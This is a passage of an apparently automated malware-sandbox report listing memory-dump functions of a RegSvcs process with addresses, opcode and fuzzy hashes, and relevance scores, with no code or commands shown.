                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $>f
                                  • API String ID: 0-2253003967
                                  • Opcode ID: daba982f359bfdbb9b687ad9438c9e2cebabd8578fdb05e0b018c0cee1766573
                                  • Instruction ID: fe60154bcbc04fe4cc7fb012c1ace27f714466f8dffae5ab36f4ed8a836da282
                                  • Opcode Fuzzy Hash: daba982f359bfdbb9b687ad9438c9e2cebabd8578fdb05e0b018c0cee1766573
                                  • Instruction Fuzzy Hash: E3A14E34A10215CFDB58DF64C994A9AB7B2FF89300F1081E9E50AAB3A1DF719E85CF41
                                  Function 02BF2B50 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P/q1
                                  • API String ID: 0-3198327278
                                  • Opcode ID: 0f8e9189f7a4ad189061436f1d6c2a2b0750f9602913a4ffcc053a32da626696
                                  • Instruction ID: 4a21f7b05f43f321cfbd445ef5a4fa411146b9cfc15f083ceaa4595f2538400c
                                  • Opcode Fuzzy Hash: 0f8e9189f7a4ad189061436f1d6c2a2b0750f9602913a4ffcc053a32da626696
                                  • Instruction Fuzzy Hash: 5C41B031A00205CFC7A4CF79C985A6BBBF2FF84350F1588AAE95ADB655D230E949CF01
                                  Function 05603B39 Relevance: .5, Instructions: 518COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e92854dcef36cbe5ea8b62221edb5339d1c1cbc993b50cf767e77d23787b1275
                                  • Instruction ID: fcfa0d371e9405b67f737c3a9bf0c70637bcdfbc41b584cf519424eab1f947fd
                                  • Opcode Fuzzy Hash: e92854dcef36cbe5ea8b62221edb5339d1c1cbc993b50cf767e77d23787b1275
                                  • Instruction Fuzzy Hash: 40225F30B002059FCB28DF69C584AAEBBF2BF88315F149959E906DB7A1DB31ED41CB50
                                  Function 02BF5548 Relevance: .3, Instructions: 299COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adb204aee1810ffb2fea723be90158bd6a6eef92dcf7846a3b350c52e2ad7faf
                                  • Instruction ID: 39d7a0efc9f6df28a05cb1cd4752757d2caabb3d155b5382eadf129d3586390a
                                  • Opcode Fuzzy Hash: adb204aee1810ffb2fea723be90158bd6a6eef92dcf7846a3b350c52e2ad7faf
                                  • Instruction Fuzzy Hash: 97B11470E082148FC765CB68C49176EFBF6AFC9300B98C5AAE556DB266C770EC45CB90
                                  Function 02BF5121 Relevance: .3, Instructions: 276COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fc338ed34fe0f48f146c89f3f5087d5562f0cebdbfcc7562333a634d90ea5d9
                                  • Instruction ID: d2ba2c509db38079e3ee9193d7e61c711fbfc05b8227974ff2a6af114dcc8a22
                                  • Opcode Fuzzy Hash: 2fc338ed34fe0f48f146c89f3f5087d5562f0cebdbfcc7562333a634d90ea5d9
                                  • Instruction Fuzzy Hash: 35B1E430A042108FCBA9CB69C5A466EFBF6EFC5300B58C5AAD556DB269C730ED85CB50
                                  Function 02BF5148 Relevance: .3, Instructions: 267COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ec1a5301f68f3ff620b664beb438af70987d93c14fb915906f14b830d201b27
                                  • Instruction ID: bb209af02cd2be04c6316d21eb9faf0ece05e6a723d584e6b97a14e6619a7e3b
                                  • Opcode Fuzzy Hash: 9ec1a5301f68f3ff620b664beb438af70987d93c14fb915906f14b830d201b27
                                  • Instruction Fuzzy Hash: B1A1E430B042108BDB69CB6DC59466EFBF6EFC5300B98C5AAD156DB268C770ED85CB50
                                  Function 02BF5538 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9753b8aca22fa128d92b10beff7d8ecb2a19f9e53858380649f83e3ea3d40c7
                                  • Instruction ID: 38a794e20481370d233eec4e5a1282c2b5480dcb27c37adcb8e5c9c2a4717d6a
                                  • Opcode Fuzzy Hash: d9753b8aca22fa128d92b10beff7d8ecb2a19f9e53858380649f83e3ea3d40c7
                                  • Instruction Fuzzy Hash: B7A1C170E042148FCB65CB68C49076EFBF6AFC9300B54C9AAE156DB265C770EC45CB90
                                  Function 02BF6698 Relevance: .3, Instructions: 260COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 381da3754f4f772be5ad8e151e93591c1d14d72dda515eba79f4a67f4ec7f65d
                                  • Instruction ID: b0b0604dd37689655947279ed33676d5c68fc6b5a93e66f1e762f2cdfc5c79b1
                                  • Opcode Fuzzy Hash: 381da3754f4f772be5ad8e151e93591c1d14d72dda515eba79f4a67f4ec7f65d
                                  • Instruction Fuzzy Hash: 7E818034B002189BDB5CAF75885467E77BBBFCC750B05C56DE966EB288CE34880AC791
                                  Function 02BF42D9 Relevance: .3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 875b9ac8297bd691bd7d1f79e4492c2531e068ff11fd9ece7e9b056d569f37e0
                                  • Instruction ID: 1e8fc91a06f45c6d15dbe065e9ae7e6d98bcc2c4c732be5aa62a70888d25aa7d
                                  • Opcode Fuzzy Hash: 875b9ac8297bd691bd7d1f79e4492c2531e068ff11fd9ece7e9b056d569f37e0
                                  • Instruction Fuzzy Hash: 04A1A230A042148FCB95CB69D58067FFBF2AFC6300B15D9AAD666E7655C730EC48CB54
                                  Function 02BF35B0 Relevance: .2, Instructions: 212COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61713748b4bcdd681ca169c83560bb8f0e2c9bd91c2c46053b684727d217f70
                                  • Instruction ID: 279efff0f0ddcebb02b3a45d5c33933a5e416b2ebb912fef0fc74a1bdad30cbc
                                  • Opcode Fuzzy Hash: c61713748b4bcdd681ca169c83560bb8f0e2c9bd91c2c46053b684727d217f70
                                  • Instruction Fuzzy Hash: 3E71F9B6F182958FCB84CF6CC9819AEFFF5AB85210F1180E6D605EB351C634DA49CB91
                                  Function 02BF36D0 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cabc9e58e369ef88b51731538094c585451b3508e72833baad127f19cd534e50
                                  • Instruction ID: 28437e473e6893a96b064c6fa3d9431379d2a0988175e2ccd1f16ce5cc4cc836
                                  • Opcode Fuzzy Hash: cabc9e58e369ef88b51731538094c585451b3508e72833baad127f19cd534e50
                                  • Instruction Fuzzy Hash: 8041A3B5E1429A8FCB84CF5CC9859AEBBF5EB88204F0181E6D506EB650C334DA44CB91
                                  Function 02BF2B40 Relevance: .1, Instructions: 113COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6ffcc3a90660531eacc5d24ab41ee5ef317652f12fe0543dd4c1731c9e12f8c
                                  • Instruction ID: 8d4f35a4343306e57c4d078086744be589640bf56de7eaa8833527b6b9b05d93
                                  • Opcode Fuzzy Hash: c6ffcc3a90660531eacc5d24ab41ee5ef317652f12fe0543dd4c1731c9e12f8c
                                  • Instruction Fuzzy Hash: B841F431A04205CFC7A4CF79C981A6ABBF1FF84310F1588AAD95ADB661D234E948CF01
                                  Function 05608B1F Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 22c81e77c006f428ae4276e52d64b9ad8f020c1737b5aa83f90e8470ba101530
                                  • Instruction ID: 1787d67c5b0efc221530e7760279e2567ae73a84c0b6e51b9541ded95ead784b
                                  • Opcode Fuzzy Hash: 22c81e77c006f428ae4276e52d64b9ad8f020c1737b5aa83f90e8470ba101530
                                  • Instruction Fuzzy Hash: D641C370614209CFDB18EF38D8957AEB677ABC9340F1094BA850AEB391CB348E41CF51
                                  Function 05608A8A Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a654375a9f482cad9f217d325fb08ba5e016b49211c45575780b446ea688475
                                  • Instruction ID: b87e28f8879280663c41164bc8b85321170c0ae35bfb4c803f0697844f93db8b
                                  • Opcode Fuzzy Hash: 1a654375a9f482cad9f217d325fb08ba5e016b49211c45575780b446ea688475
                                  • Instruction Fuzzy Hash: 77419470A04219CFDB68DF24D8917AFB776AB89340F1094AAC50AAB791CB35CE42DF51
                                  Function 05608ADF Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39539442b137b4bfd74fafd9fba817a3c7d398aff87ddce84451642b18b6fd50
                                  • Instruction ID: 9110660d9b5f697bcff882dc1af987bee8a8c4dd40798821a871cfd7597b1f71
                                  • Opcode Fuzzy Hash: 39539442b137b4bfd74fafd9fba817a3c7d398aff87ddce84451642b18b6fd50
                                  • Instruction Fuzzy Hash: 9C41B47070421ACFDB68DF24D8917AEB776AB85340F1094BAC50AAB391CB35CE41DF51
                                  Function 02BF35A0 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f188e075f3a3871f666bf8187ad2d179b5dc4e31823f9c1fc987e5db0a151d38
                                  • Instruction ID: 08ab1c9c3b2f6e70dbbb4e58a29fd7b43e89a1e279bfc39943ca5f77e16ce505
                                  • Opcode Fuzzy Hash: f188e075f3a3871f666bf8187ad2d179b5dc4e31823f9c1fc987e5db0a151d38
                                  • Instruction Fuzzy Hash: 0E21D672F192469BCB84CF59C5855AEFBB5BBC5310F1084E7C615EB252DA30DA09CB82